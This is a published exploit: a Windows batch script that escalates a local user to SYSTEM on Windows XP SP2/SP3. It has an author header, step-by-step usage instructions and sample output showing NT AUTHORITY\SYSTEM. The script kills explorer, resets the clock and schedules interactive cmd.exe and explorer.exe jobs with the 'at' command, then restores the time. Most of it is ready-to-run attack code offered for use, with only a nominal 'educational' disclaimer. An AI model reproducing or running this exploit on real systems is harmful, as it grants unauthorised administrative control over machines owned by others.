# Microsoft WinXP sp2/sp3 local system privilege escalation exploit
#
# Platform: Windows XP SP2/SP3
# Type: local
# Exploit Author: Todor Donev [todor.donev][@][gmail.com]
#
# Good luck and Have fun!!
# Kind regards to so sweet baby Tsvetelina Emirska
# Thank you Lina and thanks that all my friends are beside
# me and support me everytime.
#
# Description:
#
# Copy the batch code in newfile with format .cmd or .bat and
# then start it, wait few seconds and press any key!
# This exploit kill explorer then use "at" for execute
# explorer.exe, cmd.exe and change your profile with System user privilege.
#
#
#
# Use whoami.exe for checking of your user privileges.
# Download:
#
http://www.microsoft.com/downloads/en/details.aspx?FamilyID=3E89879D-6C0B-4F92-96C4-1016C187D429
#
#
# !! USE AT YOUR 0WN RISK !!
# !! ONLY FOR EDUCATIONAL PURPOSE !!
#
# [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
#
# Added a new job with job ID = 1
# Added a new job with job ID = 2
# Added a new job with job ID = 3
# �Added a new job with job ID = 4
# Added a new job with job ID = 5
# Added a new job with job ID = 6
# �Added a new job with job ID = 7
# Added a new job with job ID = 8
# Added a new job with job ID = 9
# �Added a new job with job ID = 10
# Added a new job with job ID = 11
# Added a new job with job ID = 12
# �[*] Backup time
# The current time is: 13:36:57,67
# Enter the new time: 13:44
#
# C:\WINDOWS\system32>whoami
# NT AUTHORITY\SYSTEM
#
############## CUT HERE ###########################
@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt
############## CUT HERE ###########################
